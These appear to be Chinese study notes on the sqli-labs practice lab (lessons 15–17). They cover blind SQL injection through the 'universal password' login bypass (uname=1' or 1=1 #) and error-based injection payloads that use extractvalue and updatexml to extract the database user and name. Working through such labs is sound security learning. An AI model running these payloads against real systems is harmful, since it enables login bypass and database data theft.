less15
試了很多符號,頁面根本不顯示別的信息,猜測爲盲注
可是怎麼檢測閉合?
萬能密碼登錄
最終試出來’閉合
uname=1’ or 1=1 #
接下來就要工具跑
less16
同上用萬能密碼試閉合,工具/腳本跑
less-17
原理https://www.cnblogs.com/laoxiajiadeyun/p/10488731.html
insert基於報錯的注入,updatexml(php>5.1),extractvalue
uname=Dumb&passwd=aaa' or extractvalue(1, concat(0x7c,(select user())));-- #&submit=Submit
uname=Dumb&passwd=aaa' or updatexml(123,concat('~',(select database())),123)-- #&submit=Submit